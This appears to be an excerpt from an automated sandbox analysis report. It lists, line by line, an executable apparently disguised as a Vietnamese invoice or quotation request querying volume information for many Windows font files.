              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
